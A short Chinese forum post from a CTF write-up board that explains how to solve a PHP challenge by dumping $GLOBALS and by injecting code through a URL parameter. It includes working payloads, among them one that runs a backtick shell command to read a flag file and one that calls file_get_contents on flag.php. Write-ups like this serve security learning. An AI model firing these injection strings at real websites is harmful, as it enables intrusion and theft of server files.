论坛首页 > CTF&WP专版

CTF-2解题思路

Track-子羽 · 发表于 2021-11-04 15:47:34 · CTF&WP专版

解题思路

利用超全局变量GLOBALS
$GLOBALS — 引用全局作用域中可用的全部变量

index.php?args=GLOBALS

利用命令注入:

index2.php?hello=1);echo `cat flag2.php`;//

另一种利用方法:

index2.php?hello=file_get_contents(%27flag.php%27)

打赏我,让我更有动力~

0 条回复 | 直到 2021-11-4 | 827 次浏览

登录后才可发表内容